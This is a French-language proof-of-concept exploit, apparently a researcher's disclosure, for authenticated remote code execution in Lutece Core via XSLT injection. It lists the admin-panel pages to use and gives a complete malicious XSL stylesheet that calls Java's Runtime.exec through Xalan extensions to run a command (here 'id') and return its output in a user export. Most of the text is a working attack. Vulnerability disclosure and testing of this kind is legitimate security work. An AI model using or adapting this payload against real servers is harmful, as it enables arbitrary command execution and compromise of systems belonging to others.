
Preuve de concept d'exploitation pour l'exécution de code à distance authentifiée via une injection XSLT dans Lutece Core, démontrant l'exécution de commandes à travers des feuilles de style XSL conçues à cet effet.
> Explications et plus sur mon site web <
Vous avez besoin d'un compte avec des privilèges administrateur.
Sur le panneau d'administration, accédez à la page de gestion des exports XSL :
/jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport
Cliquez sur « Ajouter une nouvelle feuille de transformation ».
Téléversez un fichier .xsl avec le payload (simple commande id) :
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
<xsl:template match="/">
<xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
<xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
<xsl:variable name="reader" select="is:new($inputStream)"/>
<xsl:variable name="buffereReader" select="br:new($reader)"/>
<xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
<Output>
<xsl:value-of select="$resultat"/>
</Output>
</xsl:template>
</xsl:stylesheet>
Enregistrez la nouvelle feuille XSL.
Accédez à la page d'export des utilisateurs :
/jsp/admin/user/ExportUsers.jsp
Sélectionnez la feuille de transformation que nous venons de créer et validez.
Le résultat de la commande id devrait se trouver dans le fichier exporté.